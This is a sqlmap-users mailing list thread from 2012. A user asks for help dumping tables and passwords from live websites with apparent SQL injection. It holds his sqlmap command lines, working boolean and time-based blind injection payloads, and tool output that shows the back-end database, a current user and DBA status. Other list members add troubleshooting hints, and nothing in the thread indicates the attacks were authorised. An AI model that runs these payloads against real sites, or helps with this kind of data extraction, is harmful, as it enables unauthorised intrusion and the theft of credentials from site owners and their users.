Hi Stampar,
Thanks for your email . i try again . with payload hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22 but the result the same . maybe the server filter out the data.
thanks you all the same
bob
But why have you put that OR 54=54 inside post data. It's fascinating that no matter what protection mechanism we put inside sqlmap against users themself they'll find a way how to skip the nag message and report a bug of some kind.
Could you please retry without that and use --flush-session?
Kind regards
Hi Stampar,THanks for your email , i fix the last problem with your direction .but another problem is coming . i have find inject point ,but can't retrieve data . details as followed .root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.xxxx/F/01/product/Products.asp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del="&" --hex -asqlmap/1.0-dev-a40d7a5 - automatic SQL injection and database takeover tool[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 13:53:13[13:53:13] [INFO] resuming back-end DBMS 'mysql'[13:53:13] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: hidJumpIdType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22---[13:53:18] [INFO] the back-end DBMS is MySQL[13:53:18] [INFO] fetching banner[13:53:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:53:18] [INFO] retrieved:[13:53:18] [INFO] heuristics detected web page charset 'ascii'[13:53:18] [INFO] retrieved:web server operating system: Windows 2000web application technology: ASP, Microsoft IIS 5.0back-end DBMS: MySQL 5[13:53:18] [INFO] fetching banner[13:53:19] [INFO] retrieved:[13:53:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'banner: None[13:53:19] [INFO] fetching current user[13:53:20] [INFO] retrieved:current user: None[13:53:20] [INFO] fetching current database[13:53:21] [INFO] retrieved:current database: None[13:53:21] [INFO] fetching server hostname[13:53:22] [INFO] retrieved:hostname: None[13:53:22] [INFO] testing if current user is DBA[13:53:22] [INFO] fetching current user[13:53:22] [INFO] retrieved:current user is DBA: True[13:53:23] [INFO] fetching database users[13:53:23] [INFO] fetching number of database users[13:53:24] [INFO] retrieved:[13:53:24] [CRITICAL] unable to retrieve the number of database usersbest regardsbob------------------------------------ 原始邮件 ------------------发件人: "Miroslav Stampar"<miroslav.stam...@gmail.com>;发送时间: 2012年11月15日(星期四) 下午2:26收件人: "Bob"<stock.l...@qq.com>;主题: Re: [sqlmap-users] 回复: sqlmap y/N can 't workableHi.
You are running sqlmap as a background console process. You can't expect from a such process to be able to properly accept console input you do. This is not an sqlmap issue but yours.
If you want to run more instances of sqlmap at the same time either open multiple terminals or use some kind of console multiplexer (e.g. screen).
Kind regards,
Miroslav StamparOn Nov 15, 2012 6:53 AM, "Bob" <stock.l...@qq.com> wrote:HI Iago,The sqlmap error .details as followed :[13:32:02] [INFO] testing connection to the target url[13:32:06] [INFO] testing if the url is stable, wait a few seconds[13:32:11] [INFO] url is stable[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic[13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic[13:32:14] [WARNING] reflective value(s) found and filtering out[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[13:33:41] [INFO] testing 'Oracle AND time-based blind'[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive[13:34:12] [INFO] heuristics detected web page charset 'ascii'POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] NN: command not found[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=[4]+ Stopped ./sqlmap.py -u "http://XXX" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=------------------ 原始邮件 ------------------发件人: "Iago Sousa"<146050...@gmail.com>;发送时间: 2012年6月24日(星期天) 中午12:33收件人: "Bob"<stock.l...@qq.com>;抄送: "sqlmap-users"<sqlmap-users@lists.sourceforge.net>;主题: Re: [sqlmap-users] sqlmap always tell Connection timed out to thetarget urlI think that the site is blocking your ip address.
On Jun 23, 2012 11:09 PM, "Bob" <stock.l...@qq.com> wrote:
Hi all,
I am use sqlmap to retrieve database
current-user and current-db can workable
retrieve tables ,passwords etc will response time out
Could you tell me what is the problem ? how i can retrieve tables and passwords ?
Thanks
bob
[09:56:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c_sn
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl
---
[09:56:08] [INFO] testing MySQL
[09:56:08] [INFO] confirming MySQL
[09:56:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
[09:56:08] [INFO] fetching current user
[09:56:08] [INFO] resumed: keyway_db@localhost
current user: 'keyway_db@localhost'
[09:56:08] [INFO] fetching database users privileges
[09:56:08] [INFO] fetching database users
[09:56:08] [INFO] fetching number of database users
[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:56:08] [INFO] retrieved:
[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[10:00:12] [CRITICAL] connection timed out to the target url or proxy
[*] shutting down at 10:00:12
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------
Monitor your physical, virtual and cloud infrastructure from a single
web console. Get in-depth insight into apps, servers, databases, vmware,
SAP, cloud infrastructure, etc. Download 30-day Free Trial.
Pricing starts from $795 for 25 servers or applications!
http://p.sf.net/sfu/zoho_dev2dev_nov
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
------------------------------------------------------------------------------ Monitor your physical, virtual and cloud infrastructure from a single web console. Get in-depth insight into apps, servers, databases, vmware, SAP, cloud infrastructure, etc. Download 30-day Free Trial. Pricing starts from $795 for 25 servers or applications! http://p.sf.net/sfu/zoho_dev2dev_nov
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users